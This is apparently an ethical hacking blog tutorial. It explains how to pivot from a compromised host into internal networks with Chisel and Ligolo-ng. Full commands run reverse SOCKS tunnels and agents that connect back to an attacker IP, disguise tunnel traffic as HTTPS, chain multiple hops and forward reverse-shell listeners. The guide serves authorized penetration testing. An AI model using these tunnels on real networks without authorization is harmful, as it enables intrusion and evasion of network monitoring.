Ethical Hacking #chisel#ligolo-ng#tunneling

Chisel and Ligolo-ng: Tunneling Guide for Pentests

Master Chisel and Ligolo-ng for network pivoting in penetration tests. Set up reverse proxies, SOCKS tunnels, and pivot through restricted networks.

7 min read

Chisel and Ligolo-ng: Network Tunneling for Penetration Testers

Network pivoting — routing your attack traffic through a compromised host to reach otherwise unreachable internal segments — is one of the most important skills in advanced penetration testing. Two tools dominate modern pivoting: Chisel, a fast TCP/UDP tunnel over HTTP, and Ligolo-ng, a professional-grade tunneling solution that creates a kernel-level network interface for seamless pivoting. This guide covers both, so you can choose the right tool for each engagement.

Legal notice: Only perform these techniques on networks you own or have explicit written authorization to test.

Understanding Pivoting

In a typical pentest, you compromise a host (the pivot or jump host) that sits at a network boundary. That host has access to an internal segment your attacker machine cannot reach directly. Tunneling tools let you forward your traffic through the pivot so your tools can reach the internal network transparently.

Attacker → Internet → [Pivot Host] → Internal Network (10.10.10.0/24)

Part 1: Chisel

Chisel is a single-binary tool written in Go. It runs over HTTP/HTTPS, making it firewall-friendly. One binary acts as the server (on your attacker machine) and another instance acts as the client (on the pivot).

Installation

# Download from GitHub releases
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz
gunzip chisel_1.9.1_linux_amd64.gz
mv chisel_1.9.1_linux_amd64 chisel
chmod +x chisel

# Windows client (for Windows pivots)
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz

SOCKS5 Reverse Proxy (Most Common)

On your attacker machine (server mode):

./chisel server --port 8080 --reverse --socks5
  • --reverse allows clients to expose ports back to the server
  • --socks5 enables a SOCKS5 proxy endpoint
  • --port 8080 runs the HTTP server on port 8080 (blend into web traffic)

On the pivot host (client mode):

./chisel client 10.10.14.5:8080 R:socks

R:socks tells the server to open a SOCKS5 proxy on port 1080 (default) that routes through this client connection.

Configure proxychains on attacker machine:

# /etc/proxychains4.conf — add at the end:
socks5 127.0.0.1 1080

Now prefix any command with proxychains to route it through the pivot:

proxychains nmap -sT -Pn -p 22,80,443,3389 10.10.10.50
proxychains curl http://10.10.10.50/
proxychains ssh user@10.10.10.50

Forward Port Tunneling

Forward a specific port from the pivot’s internal network to your local machine:

Client (on pivot):

# Expose the internal RDP host at 10.10.10.20:3389 as localhost:13389 on attacker
./chisel client 10.10.14.5:8080 R:13389:10.10.10.20:3389

Now connect: rdesktop 127.0.0.1:13389

Local Port Forward

If you need the opposite direction — expose a local attacker port to the pivot:

# Make attacker's port 80 accessible from the pivot at localhost:8000
./chisel client 10.10.14.5:8080 8000:127.0.0.1:80

Running Chisel Over HTTPS

Use a self-signed certificate to encrypt the tunnel:

# Generate cert
openssl req -x509 -nodes -newkey rsa:2048 \
  -keyout server.key -out server.crt -days 365 -subj "/CN=chisel"

# Server with TLS
./chisel server --port 443 --reverse --socks5 \
  --tls-cert server.crt --tls-key server.key

# Client connecting over TLS
./chisel client --tls-skip-verify https://10.10.14.5:443 R:socks

Running on port 443 with TLS makes Chisel traffic nearly indistinguishable from legitimate HTTPS.

Part 2: Ligolo-ng

Ligolo-ng is a next-generation tunneling tool that creates a virtual network interface (tun) on the attacker machine. Instead of using proxychains (which has limitations with UDP and non-CONNECT protocols), Ligolo routes traffic at the kernel level — your tools connect directly as if the internal network were local.

Architecture

  • proxy — runs on your attacker machine, manages the TUN interface
  • agent — runs on the pivot host, connects back to the proxy

Installation

# Download both binaries from GitHub
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/proxy_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/agent_linux_amd64.tar.gz

tar xzf proxy_linux_amd64.tar.gz
tar xzf agent_linux_amd64.tar.gz

Setup: TUN Interface

# Create the tun interface (once per boot)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

Start the Proxy (Attacker Machine)

sudo ./proxy -selfcert -laddr 0.0.0.0:11601
  • -selfcert generates a temporary certificate automatically
  • -laddr is the listening address for agent connections

You will see the Ligolo-ng interactive console.

Connect the Agent (Pivot Host)

Transfer the agent binary to the pivot, then:

./agent -connect 10.10.14.5:11601 -ignore-cert

On Windows pivots:

.\agent.exe -connect 10.10.14.5:11601 -ignore-cert

Create the Tunnel Session

Back in the Ligolo-ng proxy console:

ligolo-ng » session
# Select the connected agent session (number shown in list)
[Agent: pivot-host] » start

Add a Route to the Internal Network

# In a new terminal on your attacker machine
sudo ip route add 10.10.10.0/24 dev ligolo

Now all traffic destined for 10.10.10.0/24 is routed through Ligolo-ng — no proxychains needed:

nmap -sV -p- 10.10.10.50          # Full scan, direct
curl http://10.10.10.50/           # HTTP, direct
ssh user@10.10.10.50               # SSH, direct

Pivoting Through Multiple Hops

If your pivot host can reach a second internal network (172.16.0.0/24), start a second agent on that pivot:

# On the second pivot (reached via the first pivot's tunnel)
./agent -connect 10.10.14.5:11601 -ignore-cert

Add another route:

sudo ip route add 172.16.0.0/24 dev ligolo

Select the second session in the Ligolo-ng console and start it. You now have transparent access to a second network segment.

Listener (Reverse Connections from Internal Hosts)

If you need the internal network to reach your attacker machine (e.g., for catching reverse shells):

[Agent: pivot-host] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444

This forwards connections on the pivot’s port 4444 back to your local listener on 4444.

Chisel vs. Ligolo-ng: Quick Comparison

FeatureChiselLigolo-ng
ProtocolHTTP/HTTPSTLS (custom)
Proxy typeSOCKS5TUN interface (full IP)
UDP supportNoYes
Multi-hopManual chainingNative sessions
Tool compatibilityNeeds proxychainsTransparent (no proxychains)
ComplexityLowMedium
Binary size~8 MB~12 MB

Use Chisel when you need quick SOCKS proxying with minimal setup or when the pivot’s egress only allows HTTP.

Use Ligolo-ng when you need full transparent routing, UDP support, or are running tools that do not work well through proxychains (e.g., Impacket scripts, Nmap UDP scans).

Summary

Pivoting is a critical skill for penetration testers working in segmented enterprise environments. Chisel excels at quick HTTP-based SOCKS tunnels, while Ligolo-ng provides a superior transparent routing experience via a kernel TUN interface. Mastering both gives you flexibility to handle any network topology you encounter during an authorized engagement.

#penetration-testing #pivoting #tunneling #ligolo-ng #chisel

// related articles

ethical-hacking Pivoting and Tunneling Techniques in Penetration Testing 8 min read ethical-hacking BeEF Browser Exploitation Framework: Lab Guide 7 min read ethical-hacking MSFvenom Payload Generation: Complete Guide 7 min read